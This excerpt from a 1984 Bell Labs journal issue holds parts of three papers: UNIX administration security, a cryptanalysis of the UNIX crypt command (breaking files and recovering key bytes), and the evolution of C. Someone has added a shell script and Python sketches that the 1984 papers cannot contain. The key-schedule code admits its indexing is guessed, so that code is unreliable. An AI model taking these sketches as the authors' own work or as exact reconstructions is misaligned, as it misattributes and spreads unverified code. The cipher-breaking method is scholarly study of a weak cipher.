The worst group login, and one that is found on virtually all UNIX machines, is root, the login name of the super-user. Every time that someone logs in as root, the system administrator can tell that someone logged in with super-user privileges, but there is no hint as to who that person might be. Many systems make it impossible to log in as root via dial-up lines; some restrict the login to the system console. In fact, there is no need for anonymous super-users. It is better to require a normal login and effect the transformation via the su command, especially if su leaves tracks on a piece of paper somewhere. The use of restricted shells to contain people who log in without passwords or through group logins is simply ineffective.
Administrators' personal passwords are most important, both to the administrators and to potential intruders. An intruder is happy to get anybody's password that provides access to the machine. If the password is that of a system administrator and thus allows some special group permissions such as bin, sys, or uucp, so much the better. It is strongly recommended that administrators use different passwords on the machines that they maintain than they use on any other machines.
A system administrator should be able to explain the presence of every SUID-root program on the system, and to show that these have at least been looked at for surprises. Compilation from 'clean' source code is helpful, but not always sufficient.
Protection against horses for people who have super-user privileges is essential. This means checking PATH variables, directories, and files owned by such people to see that the files that they execute are writable only by themselves or by trusted administrators. Again, such protection is not sufficient, but it does remove the obvious targets.
Finally, the system administrator should work to develop an awareness of security issues in the user community as a whole.
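Part of that check can be sketched as a small script (illustrative only; the permission-column positions assume the usual ls -l long format):

```shell
#!/bin/sh
# Illustrative sketch: flag any directory on a search path that is writable
# by group or others; a horse planted in such a directory runs before /bin.
# Scans $PATH by default, or a colon-separated list given as $1.
list=${1:-$PATH}
IFS=:
for d in $list; do
    [ -z "$d" ] && d=.    # an empty PATH component means the current directory
    if [ -d "$d" ] && ls -ld "$d" | cut -c6,9 | grep -q w; then
        echo "warning: $d is writable by group or others"
    fi
done
```

The script only removes the obvious targets; it says nothing about the trustworthiness of the files inside the directories it passes.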
9.2 Users' concerns

Users, including system administrators, often have surprisingly bad habits with respect to system security. Here are some of the worst.

• Giving away logins and passwords is all too common. The same people who would never consider giving the keys to a company car to a friend are often quite willing to give away the keys to the company computer, even though the potential for loss may be orders of magnitude greater.
• Obvious swindles tend to be ignored. Most Trojan horses work only because most people have not given any thought to the fact that programs that ask for things like passwords might not be the genuine article. If something goes wrong, they ask no questions.
• Generally, little thought goes into the choice of nontrivial passwords, passwords are not changed except under duress, and a one-size-fits-all attitude is common.
• Carefree networking is the norm, not the exception.
• Sensitive information about projects and people is routinely kept on public machines.

The only approach to these problems is user education.

X. CONCLUSION

At the beginning of this paper it was noted that UNIX systems, when used for the purposes and in the environment for which they were designed, cannot be made secure. The supporting arguments for that statement should now be clear. The following ideas should also be clear:

The security of any given UNIX system can vary from very weak to very strong, depending on a large number of factors and their interactions. The most important of these is the habits and attitudes of administrators and users.

Software changes can be made that will greatly increase the security of a system. However, since the same tools can be just as potent for an intruder as for an administrator, they must be carefully designed, lest they backfire.
The question of convenience versus security, which depends on the nature of a given application, must be carefully considered before implementing and installing that application. In particular, there are some things that should not be put on any public machine.

It was also noted that the security hazards of UNIX systems are exactly those of other systems that are used for similar purposes in similar environments. Only the forms of the hazards are different. If, from the examples given, it seems easier to subvert UNIX systems than most other systems, the impression is a false one. The subversion techniques are the same. It is just that it is often easier to write, install, and use programs on UNIX systems than on most other systems, and that is why the UNIX system was designed in the first place.

REFERENCES

1. R. Morris and K. Thompson, "UNIX Password Security," CACM, 22 (November 1979), p. 594.
2. D. M. Ritchie, "Protection of Data File Contents," U.S. Patent 4,135,240, January 16, 1979.
3. K. Thompson, 1983 ACM Turing Award Lecture, New York, November 1983; also in CACM, 27, No. 8 (August 1984), p. 761.
4. D. M. Ritchie, "On the Security of UNIX," UNIX Programmer's Manual, Section 2, AT&T Bell Laboratories.
5. D. A. Nowitz and M. E. Lesk, "Implementation of a Dial-Up Network on UNIX Systems," Fall COMPCON, Washington, D.C. (September 1980), pp. 483-6.
6. D. A. Nowitz, "UUCP Implementation Description," UNIX Programmer's Manual, Section 2, AT&T Bell Laboratories.
7. R. T. Morris, "Another Try at Uucp," unpublished work.
8. D. A. Nowitz, P. Honeyman, and B. E. Redman, "Experimental Implementation of Uucp," 1984 UniForum Proc.
9. T. Truscott, "An Enhanced Uucp," Research Triangle Institute Technical Memorandum CDSR005, Research Triangle Park, North Carolina, December 1983.
10. R. H. Morris, "UNIX File Security," unpublished work.
11. J. Garlinski, The Enigma War, New York: Scribner, 1979.
12. J. A. Reeds and P. J.
Weinberger, "The UNIX System: File Security and the UNIX System Crypt Command," AT&T Bell Lab. Tech. J., this issue.

AUTHORS

Frederick T. Grampp, B.S. (Electrical Engineering), 1964, Newark College of Engineering; M.S. (Mathematics), 1969, Stevens Institute of Technology; AT&T Bell Laboratories, 1963—. Mr. Grampp has worked on a variety of software projects at AT&T Bell Laboratories. He was a Visiting Lecturer in Mathematics at Stevens Institute of Technology from 1969 to 1971, and in Computer Science at Rutgers University, 1975 to 1976. He is presently Supervisor of the Computing Facilities Research group. Member, AAAS, ACM.

Robert H. Morris, A.B. (Mathematics), 1957, A.M., 1958, Harvard University; AT&T Bell Laboratories, 1960—. Mr. Morris was first concerned with assessing the capability of the switched telephone network for data transmission in the Data Systems Engineering department. From 1962 to 1981, he was engaged in research relating to computer software. Since 1981, he has been involved in the design of a large parallel computer for signal processing. He is presently a Supervisor in the Signal Processors Engineering department. He taught mathematics at Harvard University from 1957 to 1960 and was a Visiting Lecturer in Electrical Engineering at the University of California at Berkeley from 1966 to 1967. He was an editor of the Communications of the ACM for many years.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System:
File Security and the UNIX System Crypt Command

By J. A. REEDS* and P. J. WEINBERGER*

(Manuscript received March 20, 1984)

Sufficiently large files encrypted with the UNIX™ system crypt command can be deciphered in a few hours by algebraic techniques and human interaction. We outline such a decryption method and show it to be applicable to a proposed strengthened algorithm as well.
We also discuss the role of encryption in file security.

* AT&T Bell Laboratories.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

I. FILE SECURITY

Sometimes one wants to protect a file from being read by unauthorized users or programs, while still keeping the file available to its proper users. Only in isolation is the problem easy: put the file on a machine only you have access to, and keep all copies of the file locked up. The crypt command is useful in the more complicated environment of a multiuser system.

The crypt command is a file-encryption program; the same algorithm is also part of one of the text editors. The algorithm is described in the next section. The advantage of having the algorithm embedded in an editor is that the clear text never need be present in the file system.

No technique can be secure against wiretapping or its equivalent in the computer. Therefore no technique can be secure against the system administrator or other sufficiently privileged users. For these folk it is a simple matter to replace the encryption programs with programs that look the same to their users, but that reveal the key to the sufficiently privileged. Sophisticates may be able to detect this kind of substitution if it is not done carefully, but the naive user has no chance.

To protect files from being read by a casual browser there are two independent techniques, permissions and encryption.
The authorization mechanisms supported by the system may make the file inaccessible to any but its owner. Encryption may make the contents incomprehensible. The former does not protect copies of the file on dump tapes. The latter is difficult to implement. The difficulty is not in finding a secure encryption algorithm, but in finding one that is not prohibitively expensive to use, not subject to fast search of key space, fits in with an editor, and is also sufficiently secure. File encryption then is roughly equivalent in protection to putting the contents of the file in a safe, or a locked desk, or an unlocked desk. The technical contribution of this paper is to show that crypt is rather more like the last than the first.

II. UNIX SYSTEM CRYPT

The UNIX operating system crypt command operates on consecutive blocks of 256 characters, which we term cryptoblocks to avoid confusion with the file system blocks. If the ith plaintext and ciphertext characters in the jth cryptoblock are denoted p_ij and c_ij, respectively, they are related by the following formula:

    c_ij = R^{-1}[S[R(i + p_ij) + j] - j] - i.    (1)

In (1) addition and subtraction are done modulo 256. R is a permutation of the set {0, ..., 255}. S is a self-inverse permutation of the same set, having no fixed points. Therefore S is the product of 128 disjoint 2-cycles, and for all i and j it is true that p_ij ≠ c_ij. R and S constitute the key of the cipher, and thus are not known at the beginning of the cryptanalyst's labors. (See Section V for a discussion of how they are determined from the key that the user types, and how part of the key that the user types can be determined from R and S.)

An operator notation is more useful, in which eq. (1) can be rewritten as

    c_ij = C^{-i} R^{-1} C^{-j} S C^j R C^i p_ij,    (2)

where C, mapping x to x + 1, is the cyclic shift transformation (Caesar shift is the usual jargon).
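Formula (1) is concrete enough to transcribe directly. The following sketch (in Python, with a randomly generated R and S standing in for crypt's real key schedule, which is described in Section V) checks two properties relied on later: the cipher is an involution on each cryptoblock, and, because S has no fixed points, no character ever encrypts to itself.

```python
import random

BLOCK = 256  # characters per cryptoblock

def toy_key(seed=12345):
    # Stand-in key material: R is a random permutation of 0..255 and S a
    # random fixed-point-free involution (128 disjoint 2-cycles). This is
    # NOT crypt's key schedule; it merely has the right algebraic shape.
    rnd = random.Random(seed)
    R = list(range(BLOCK))
    rnd.shuffle(R)
    pts = list(range(BLOCK))
    rnd.shuffle(pts)
    S = [0] * BLOCK
    for a, b in zip(pts[0::2], pts[1::2]):
        S[a], S[b] = b, a
    return R, S

def crypt_block(block, j, R, S):
    # c_ij = R^-1[ S[ R(i + p_ij) + j ] - j ] - i, everything modulo 256.
    Rinv = [0] * BLOCK
    for x, y in enumerate(R):
        Rinv[y] = x
    return [(Rinv[(S[(R[(i + p) % BLOCK] + j) % BLOCK] - j) % BLOCK] - i) % BLOCK
            for i, p in enumerate(block)]

R, S = toy_key()
rnd = random.Random(7)
plain = [rnd.randrange(BLOCK) for _ in range(BLOCK)]
cipher = crypt_block(plain, 3, R, S)
```

Applying crypt_block twice with the same j returns the original block, which is why one program serves for both encryption and decryption.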
One weak point in the cipher is that the index i hardly enters into formula (2). If we let

    A_j = R^{-1} C^{-j} S C^j R    (3)

then c_ij = C^{-i} A_j C^i p_ij, where A_j is self-inverse, and without fixed points. This decomposes the cryptanalysis into two parts, the first being the recovery of A_j in each of several successive cryptoblocks, and the second being processing information about the A_j's to get R and S.

III. RECOVERING A_j

3.1 Known plaintext solution

Suppose the cryptanalyst has parallel plaintext and ciphertext. This should be enough to recover most of the A_j. The cryptanalyst should concentrate on one cryptoblock and drop the subscript j. For each value of i for which the cryptanalyst has c_i and p_i,

    C^i c_i = A C^i p_i

from the definition of A. Thus A(i + p_i) = i + c_i, and because A is self-inverse, A(i + c_i) = i + p_i. If all 256 plaintext characters are known for the cryptoblock, there will be a lot of these equations, and most of A will be known.

More precisely, A is the product of 128 disjoint 2-cycles. Each i for which the plaintext is known determines one of the 2-cycles. If one assumes that the 2-cycles have equal probability of being chosen, the chance of a given 2-cycle not being chosen is (127/128)^256 = (1 - 2/256)^256, the expected number of 2-cycles not chosen is 128(1 - 2/256)^256, and the expected number of known values is approximately 256(1 - e^{-2}), which is 221.35. Thus, each block of known plaintext should give all but about 35 of the values of A_j.

3.2 Unknown plaintext solution

This, of course, is harder. We assume that the plaintext is all ASCII, and that the cryptanalyst has a stock of probable words or phrases that the plaintext plausibly contains. We proceed by trying to place a probable word in all possible positions in the current cryptoblock. Most of these trial placements will result in contradictions.
Either they imply that some plaintext characters cannot be ASCII, or they are self-contradictory, or they contradict the implications of a previous placement of a probable word. We consider these cases one by one.

Suppose that one plaintext character, say p_i, is known. Then one of the 2-cycles of A is known, the one that interchanges p_i + i and c_i + i. There are 255 other values of j for which c_j + j might fall in this 2-cycle, and the chance that none does is (127/128)^255, which is about 0.135. (Since the success of the attack doesn't depend on these calculations, the hidden randomness assumptions can remain hidden.) So with probability about 86.5 percent, we find some other value of j for which c_j + j is in the known 2-cycle, and so the corresponding value of p_j is known too. If the initial guess at p_i were wrong, then this guess at p_j has a 50-percent chance of not being ASCII (assuming that all 128 ASCII characters are legal). Thus each individual guess at a plaintext character has better than a 40-percent chance of being shown wrong because it would imply some plaintext character is not ASCII. A longer probable word, incorrect in all its letters, is even less likely to be acceptable.

There is another kind of constraint probable text imposes on the ciphertext. If there are two places, say i and j, in the same cryptoblock of plaintext satisfying p_i + i = p_j + j, then the definition of A shows that c_j - c_i = i - j. For instance, the word "include", common near the beginning of C programs, contains two of these constraints, "n.l" and "i...d". One expects only about one place in each cryptoblock where even one of these constraints is satisfied (other than at the place where "include" belongs), so the chance of the two being satisfied erroneously is quite small (but not negligible).

Finally, a trial placement may be incompatible with earlier, accepted, placements of probable words.

This is all easy to package into programs.
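Both kinds of deduction, the 2-cycle identity of Section 3.1 and the internal constraints carried by a probable word, are mechanical. A small Python sketch (again with random stand-in key material rather than crypt's real key schedule):

```python
import random

BLOCK = 256

def toy_key(seed=12345):
    # Random stand-in R (permutation) and S (fixed-point-free involution).
    rnd = random.Random(seed)
    R = list(range(BLOCK))
    rnd.shuffle(R)
    pts = list(range(BLOCK))
    rnd.shuffle(pts)
    S = [0] * BLOCK
    for a, b in zip(pts[0::2], pts[1::2]):
        S[a], S[b] = b, a
    Rinv = [0] * BLOCK
    for x, y in enumerate(R):
        Rinv[y] = x
    return R, Rinv, S

def A_of(j, R, Rinv, S):
    # Formula (3): A_j = R^-1 C^-j S C^j R.
    return [Rinv[(S[(R[x] + j) % BLOCK] - j) % BLOCK] for x in range(BLOCK)]

def recover_A(plain, cipher):
    # Section 3.1: each known character gives one 2-cycle,
    # A(i + p_i) = i + c_i, and, A being an involution, A(i + c_i) = i + p_i.
    A = [None] * BLOCK
    for i, (p, c) in enumerate(zip(plain, cipher)):
        A[(i + p) % BLOCK] = (i + c) % BLOCK
        A[(i + c) % BLOCK] = (i + p) % BLOCK
    return A

def word_constraints(word):
    # Section 3.2: positions a < b with word[a] + a == word[b] + b force
    # c_b - c_a = a - b in any correct placement of the word.
    return [(a, b)
            for a in range(len(word)) for b in range(a + 1, len(word))
            if ord(word[a]) + a == ord(word[b]) + b]

R, Rinv, S = toy_key()
A_true = A_of(5, R, Rinv, S)
rnd = random.Random(99)
plain = [rnd.randrange(128) for _ in range(BLOCK)]   # "all ASCII"
cipher = [(A_true[(i + p) % BLOCK] - i) % BLOCK for i, p in enumerate(plain)]
A_guess = recover_A(plain, cipher)
known = sum(v is not None for v in A_guess)
```

For "include" the constraint pairs come out as (0, 5) and (1, 3), the "i...d" and "n.l" of the text, and a fully known block recovers roughly the 221 of the 256 values of A computed in Section 3.1.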
One could start with a special-purpose editor that gets probable text from the user and presents all contradiction-free placements and the resulting decipherment. The user then accepts those placements that produce the best looking decipherment, and suggests new probable words. Such an editor can be used to decrypt a completely unknown C program in a few hours, or less. Getting one block generally takes a while, but then the cryptanalyst has a good idea of the style and subject of the program, and other blocks take less time.

Sometimes it is useful to look first for all contradiction-free placements of a single, long probable word in all blocks of a file rather than look for several probable words in a single block.

3.3 A statistical attack

The following idea was developed by Robert Morris. Before attacking an unknown plaintext, one can automatically generate a lot of plausible plaintext by a statistical analysis of each of the cryptoblocks. In essence one applies the unknown plaintext attack outlined above to the 20 one-letter probable words formed by the 20 most common ASCII letters. Each of the possible 5120 trial placements of these "words" in a given cryptoblock is scored according to the resulting plaintext it generates, using a formula involving logarithms of the probabilities of the ASCII letters. Any decipherment resulting in non-ASCII letters is immediately ruled out. Otherwise, disputes between contradictory trial placements are resolved in favor of the trial placement with the greater score.

This process ends with a partially deciphered cryptoblock with lots of "noisy" plaintext visible to an indulgent eye. It is easy to use guesses based on this noisy plaintext as a starting point for a session with an interactive crypt-breaking editor, as we described above.

IV. KNITTING

Once several blocks have been mostly decrypted, the corresponding information about the A_j can be used to recover R and S. Let Z = R^{-1} C R.
Then (3) can be rewritten as

    A_j = Z^{-j} A_0 Z^j

and hence Z A_{j+1} = A_j Z. We call this the knitting equation: Z knits the A_j sequence together. We solve this last equation for Z, from which a value for R can be found. Once R is known, the equation S = R A_0 R^{-1} gives a value for S. Even if all this works out, R and S are not completely determined, for if the pair (R, S) works, so will (C^k R, C^k S C^{-k}), for any k.

The idea behind solving for Z is simple. Suppose we hypothesize Zx = y. Then for each value of j for which u = A_j(y) and v = A_{j+1}(x) are known, it must be true that Zv = u. Hence if several successive A's are fairly well known, each hypothesis about Z will generate several more, and so forth, and all these have to be consistent with all that is known about the A's. In practice there is a chain reaction of hypotheses about Z that quickly leads to a contradiction if the initial guess was wrong. Once Z has been mostly recovered, one can use the knitting equation to fill in missing values in the A's.

V. RECOVERING SOME KEY BYTES

Once R and S are known, it is possible to determine the first two letters of the key the user typed. At the same time we discover which of the 256 equivalent (R, S) pairs was generated by crypt.

5.1 How R and S are built

The user's key is transformed into 13 bytes b_0, b_1, ..., b_12 by the same subroutine used to encrypt UNIX passwords. b_0 and b_1 can be any characters the user can type, so 0 ≤ b_0, b_1 < 128, while the rest of the b_i are restricted to the 64 characters ".", "/", "0", ..., "9", "A", ..., "Z", "a", ..., "z".

From these bytes the program builds various pseudorandom numbers from which it constructs R and S. The details are a bit tedious. First mix all the b_i together:

    x_0 = 123
    x_{i+1} = x_i b_i + i,    0 ≤ i ≤ 12.

Here arithmetic is done modulo 2^32, and -2^31 ≤ x_i < 2^31. Now compute a sequence of s's:

    s_{-1} = x_13
    s_i = 5 s_{i-1} + b_i,    0 ≤ i < 256.
Here s_i is computed modulo 2^32, -2^31 ≤ s_i < 2^31, and the subscript on b is evaluated modulo 13. Next, compute some r's:

    r_i = s_i (mod 65521),

where the peculiar notation means that r_i has the same sign as s_i and -65520 ≤ r_i ≤ 65520. Now compute

    u_i = r_i (mod 256),      0 ≤ u_i < 256,
    v_i = r_i/256 (mod 256),  0 ≤ v_i < 256.

Alternately, write r_i in 2's complement binary. Then u_i is the number given by the low-order 8 bits, and v_i is the next 8 bits.

Initialize an array representing R(i) so that R(i) = i for all i. Then compute R from the u_i by calculating

    x_i = u_i (mod i + 1),    0 ≤ x_i ≤ i,

and swapping R(255 - i) and R(x_{255-i}), successively, for i = 0, 1, ..., 255. If the u_i were uniformly distributed over a suitable set of integers, then all 256! possible R's would be equally likely.

Initialize an array representing S(i) to S(i) = 0 for all i. Then for i = 0, 1, ..., 255, successively: if S(255 - i) ≠ 0, do nothing. Otherwise, let y_i = v_i (mod 255 - i), and then, while S(y_i) ≠ 0, let y_i = y_i + 1 (mod 255 - i); then S(255 - i) = y_i and S(y_i) = 255 - i. Then S is the product of 128 2-cycles.

5.2 Finding k

Decrypting a file produces 256 cryptographically equivalent possibilities for (R, S). It is possible to determine which possibility crypt used and to recover the b_i all at once. First suppose we knew the values of all the r_i. Then

    s_i = 65521 c_i + r_i,            -65521 < c_i < 65521,
    s_{i+1} = 5 s_i + b_i + M_i 2^32,  -2 ≤ M_i ≤ 2.

The bounds on c and M follow from the bounds on s and b. Substituting and rearranging gives

    b_i = r_{i+1} - 5 r_i - 225 M_i + 65521(c_{i+1} - 5 c_i - 65551 M_i).

Consider this equation modulo 65521. b_i must be ASCII, at least; there are only five possible values for M_i; and the r's are known. Incorrect values are unlikely to give acceptable b's. Also, each value of b_i is constrained by values of i 13 apart. So knowing the r_i will determine the b_i.
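The construction just described, and the ease of running it backwards (exploited below), can be sketched in Python. The scanned text is ambiguous in places, so the seed of the s-sequence and the exact index conventions of the two loops are assumptions chosen to make the pieces fit together; this is a sketch of the scheme's shape, not a verified transcription of crypt's source.

```python
M32 = 2 ** 32

def signed32(n):
    # Reduce n modulo 2^32 into the signed range [-2^31, 2^31).
    n %= M32
    return n - M32 if n >= M32 // 2 else n

def key_schedule(b):
    assert len(b) == 13
    # Mix the b_i together: x_0 = 123, x_{i+1} = x_i * b_i + i (mod 2^32).
    x = 123
    for i in range(13):
        x = signed32(x * b[i] + i)
    # s_{-1} = the fully mixed value (assumption); s_i = 5*s_{i-1} + b_{i mod 13},
    # with r_i the signed remainder of s_i modulo 65521.
    s, r = x, []
    for i in range(256):
        s = signed32(5 * s + b[i % 13])
        r.append(s % 65521 if s >= 0 else -((-s) % 65521))
    u = [ri % 256 for ri in r]          # low-order 8 bits of r_i (2's complement)
    v = [(ri >> 8) % 256 for ri in r]   # next 8 bits
    # Build R: a descending Fisher-Yates shuffle driven by the u_i.
    R = list(range(256))
    for pos in range(255, 0, -1):
        xi = u[pos] % (pos + 1)
        R[pos], R[xi] = R[xi], R[pos]
    # Build S: pair each slot, highest first, with a lower free slot chosen
    # by v_i, advancing past slots that are already paired.
    S = [None] * 256
    for i in range(256):
        pos = 255 - i
        if S[pos] is not None:
            continue
        y = v[i] % pos                  # pos >= 1 whenever this branch runs
        while S[y] is not None:
            y = (y + 1) % pos
        S[pos], S[y] = y, pos
    return R, S

def recover_swaps(P):
    # Section 5.2's trick: read the swap indices back off the finished
    # permutation. The last-touched slot holds its own swap index; relabel
    # that value in the shortened array and recurse.
    P = list(P)
    out = []
    for i in range(len(P) - 1, 0, -1):
        x = P[i]
        out.append(x)
        P[P.index(i)] = x   # replace the value i by x
        P.pop()
    out.append(0)
    return out[::-1]

R, S = key_schedule([ord(c) for c in "pa55word.m0re"])
```

As in the text, R comes out a permutation of {0, ..., 255}, S a product of 128 2-cycles, and the swap sequence that produced R can be read straight back off of it (the 8-element example below reproduces the paper's x_7 = 4 and x_6 = 3).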
For the first part, we try each of the 256 possibilities in turn, assuming the current one is the correct R and S, and attempting to reconstruct all the b's. In practice, for the 255 incorrect values of k the process below fails to construct a consistent set of b's, and so excludes all but the correct k.

From the trial R it is easy to read off the x_i that generated it. First, x_255 = R(255). Then modify R by replacing the entry 255 with x_255, discard position 255, and proceed by induction. Here's an example, with a permutation on eight things:

    k     0 1 2 3 4 5 6 7
    R(k)  2 6 5 7 0 1 3 4

R(7) was constructed, by the algorithm above, by switching the previous value of R(7) with some R(i) with i less than 7. Hence x_7 is 4, and, at the next step, we consider a permutation on seven things:

    k     0 1 2 3 4 5 6
    R(k)  2 6 5 4 0 1 3

From this x_6 is 3, and so forth. The process is just running the construction of R backwards. Note that although R could plausibly be argued to be a random permutation, it is one that in no way conceals the data from which it was constructed. Randomness, in the sense of uniform distribution, is by no means synonymous with the intuitive meaning of not containing information. It is the latter property that is important to cryptography.

A similar process allows us to get some of the y_i. We get y_255 the same way we got x_255, but we can only deduce other y_i when we are sure that neither the while step nor the do-nothing step in the algorithm above was executed.

Now how close do x_i and y_i come to determining r_i? First, suppose we knew u_i and v_i. Then we would have 16 bits of the binary representation of r_i. Unfortunately, the possible values of r_i require nearly 17 bits, so each pair (u_i, v_i) probably is consistent with two values of r_i; therefore in the expression for b_i above there are likely to be four choices for (r_i, r_{i+1}). Clearly, there is still not much chance of getting even a single bad guess of a b_i.
So how do we get u_i and v_i? Since x_i ≡ u_i (mod i + 1), for each i ≥ 128 there are at most two choices of u_i (namely, x_i and x_i + i + 1) for each value of x_i. Likewise, if we know y_i, there are at most two choices for v_i. Thus there are four more choices to be made for each guess at an r_i. In practice this is nearly enough to determine all of the b_i uniquely for exactly one value of k. That is, there is only one of the 256 equivalent (R, S) pairs for which there are any b's left, and then there are never more than a few hundred possible sets. Only one of them, and therefore the correct one, regenerates R and S. There was no trouble doing this in 190 trials. Each trial takes a minute or two of computer time.

Thus, decrypting files enough to determine (R, S) also enables the cryptanalyst to find b_0, ..., b_12. This would not be more than a curiosity, except for the fact that the first two bytes of the user's key pass through unchanged and become b_0 and b_1. This knowledge is clearly of great use in guessing how the user makes up his keys.

VI. A PROPOSED ENHANCEMENT

A recent proposal for strengthening the crypt command is as follows. Instead of relating the ith plaintext and ciphertext letters in the jth cryptoblock by

    c_ij = C^{-i} R^{-1} C^{-j} S C^j R C^i p_ij,

it is proposed to use

    c_ij = C^{-f_i} R^{-1} C^{-j} S C^j R C^{f_i} p_ij.

R and S are as before. The new item is the function f, which may be interpreted as an irregular rotor motion. The key now is the triple (R, S, f). If f were known, then the new cipher would be breakable by the same methods as the old.

6.1 Known plaintext attack on the proposed enhancement

We first recover the f_i, and proceed as before. We note that in a given cryptoblock, if p_i + f_i = p_k + f_k, for some i and k, then c_i + f_i = c_k + f_k. Also, because the encryption is an involution, if p_i + f_i = c_k + f_k, then c_i + f_i = p_k + f_k. We can exploit these identities as follows.
If p_i + f_i = p_k + f_k, then c_i + f_i = c_k + f_k, and hence

    p_i + f_i = p_k + f_k,    c_i + f_i = c_k + f_k,
    p_i - p_k = f_k - f_i,    c_i - c_k = f_k - f_i,    (4)

and

    p_i - p_k = c_i - c_k.    (5)

Thus (4) for some i and k implies (5) for the same i and k. We take the occurrence of (5) as a sign that the four equations of (4) might have happened, and further take the common value p_i - p_k = c_i - c_k as a vote for the value of f_k - f_i. Similarly, the occurrence of p_i - c_k = c_i - p_k is a vote that f_k - f_i has this common value.

Experiments show that of all occurrences of (5), about half are caused by (4) and half are accidental. The accidental occurrences scatter their votes higgledy-piggledy, but the causal occurrences vote en bloc for the correct value of f_k - f_i. Thus for each cryptoblock we enumerate all votes of the above type, representing them by triples (i, k, d), meaning that there is a vote that f_k - f_i = d. Let V be the set of all the votes. We attempt to resolve these votes by discarding about one-half of them and building the others into a self-consistent set of values for the f_i. Note that although each instance of a vote comes from one cryptoblock, the f_i are the same from block to block, so that the votes from all the known blocks can be combined.

Each cryptoblock contributes about 500 such votes, so 2500 characters of known plaintext will generate about 5000 triples.

6.2 Voting

We are given a set V of 5000 or more triples (i, k, d), each representing an equation f_k - f_i = d. We want to find a maximal consistent subset of these equations. That is, we want values f_0, f_1, ..., f_255 that solve as many of these equations as possible.

Here is one method that works in practice. We solve instead a seemingly more complicated problem: find probability laws P_0, P_1, ..., P_255, each on the integers mod 256, such that

    L = ∏_{(i,k,d) in V} Prob(X_k - X_i = d)

is maximized, where the X's are independent random variables, each X_i with law P_i. If we let g_ij = Prob(X_i = j) = P_i({j}), then

    L = ∏_{(i,k,d) in V} ∑_{j=0}^{255} g_ij g_{k,j+d}.
L is a function of the 65,536 nonnegative variables g_ij, subject to the 256 constraints ∑_j g_ij = 1. Such a function may be readily maximized by the algorithm of Baum and Eagon [1], also called the EM algorithm. In practice the maximizing g_ij values are all close to 0 or 1, and we take for f_i that value of j for which g_ij is biggest. This takes about 20 minutes of a VAX* computer's time.

VII. SUMMARY

It turns out from this work that the UNIX system file-encryption command is not as strong as its designers had hoped. While a simple modification like the one discussed above makes encrypting short files safer, finding a much more satisfactory replacement appears hard.

REFERENCE

1. L. E. Baum and J. A. Eagon, "An Inequality With Applications to Statistical Estimation for Probabilistic Functions of Markov Processes and to a Model for Ecology," Bull. AMS, 73 (May 1967), pp. 360-3.

* Trademark of Digital Equipment Corporation.

AUTHORS

James A. Reeds, B.A. (Mathematics), 1970, University of Michigan; M.A. (Mathematics), 1972, Brandeis University; Ph.D. (Statistics), 1976, Harvard University; Assistant Professor of Statistics, University of California, Berkeley, 1977-1982; AT&T Bell Laboratories, 1983—. Mr. Reeds is in the Communications Analysis Research department of the Mathematical Sciences Research Center. Since coming to AT&T Bell Laboratories he has worked on cryptography and other computer games.

Peter J. Weinberger, B.S. (Mathematics), 1964, Swarthmore College; Ph.D. (Mathematics), 1969, University of California at Berkeley; Bellcomm, Inc., 1969-1970; Instructor and Assistant Professor of Mathematics, University of Michigan, 1970-1976; AT&T Bell Laboratories, 1976—. Mr. Weinberger is Head of the Computer Systems Research department. Since coming to AT&T Bell Laboratories he has worked on databases, operating systems, networking, and compilers.

AT&T Bell Laboratories Technical Journal Vol. 63, No.
8, October 1984
Printed in U.S.A.

The UNIX System:
The Evolution of C — Past and Future

By L. ROSLER*

(Manuscript received September 12, 1983)

The C programming language was developed originally to implement UNIX™ operating systems and their utilities. It has become a mainstay of systems and application programming at AT&T Bell Laboratories, and is rapidly growing in commercial importance. It continues to evolve in response to the needs of new environments, spanning the range from tiny peripheral controllers to huge electronic switching systems written and maintained by hundreds of programmers. There are severe reliability and real-time constraints throughout this spectrum. This paper reports changes made so far to meet the needs of these new environments and indicates the directions of current developments.

I. INTRODUCTION

The C programming language was designed in the early 1970s by Dennis M. Ritchie as part of the development of the original UNIX operating system [1]. The capabilities of the language for programming portable operating systems were enhanced rapidly as the first UNIX system was ported to other processors.

In 1978 Kernighan and Ritchie published the definitive description and reference manual [2] for the C programming language as it existed then. They were joined by Johnson and Lesk in a descriptive article [3]

* AT&T Bell Laboratories.
in this journal that evaluated the language after five years of experience, and projected future directions for its growth. This paper reports changes made in the succeeding years and indicates the direction of current developments.

A major trend in the development of C is toward stricter type checking, along the lines of languages like Pascal [4]. However, in accordance with what has been called the "spirit" of C (meaning a model of computation that is close to that of the underlying hardware), many areas of the language specification deliberately remain permissive. This allows implementors the freedom to achieve maximum efficiency by using the instructions most appropriate for each machine. (For example, the sign of the remainder on a division involving negative integers is explicitly unspecified.)

In keeping with the original sparse design of the language, nothing has been added that can only be implemented effectively by calling a run-time function. (This does not prevent an implementor from choosing to implement an operation in the language for which the hardware support is inadequate by a call to a hidden function. For example, this may be the most appropriate way to implement floating-point arithmetic on processors that do not support floating-point operations.) For this reason, the exponentiation operation is not part of the language, but must be explicitly invoked by the programmer as a function in the library.

Many other capabilities (including input/output, storage allocation, and mathematics) are integral parts of other languages but not of C. For practical reasons of application portability, the libraries that provide these capabilities for C are also subject to standardization, so they now might reasonably be viewed as extensions of the language. In recent years, major enhancements in functionality and efficiency were made to these standard support libraries. However, this paper will focus on the language proper.
Note that the material presented here represents changes to the AT&T Bell Laboratories definition of the language, not to any implementation. No existing compiler fully implements the new definition as yet, which is itself subject to change as a result of standardization efforts.

The reader is presumed to have some familiarity with C as presented by Kernighan and Ritchie [2]. References in parentheses refer to sections in The C Reference Manual printed as Appendix A of that book. However, this paper can be understood without having the book at hand.

II. PORTABILITY AND STANDARDS

To maintain the stability of a mature language while allowing controlled evolution is both a technical and an administrative challenge.

Since 1977, the Computer Technologies Area of AT&T Bell Laboratories has sponsored a committee to develop and maintain internal C standards. This committee monitors and promotes the portability and evolution of the C language proper, the support libraries without which useful work in C is impossible, and the many UNIX systems and other environments in which C is implemented. As a result of that effort, applications that do not rely heavily on the characteristics of the supporting hardware or operating system can be moved from one environment to another without significant reprogramming.

In recognition of the growing commercial importance of C, the American National Standards Institute (ANSI) chartered a technical committee (X3J11) to develop a standard for the language, libraries, and environment. The current schedule calls for a draft to be published for public comment early in 1985.

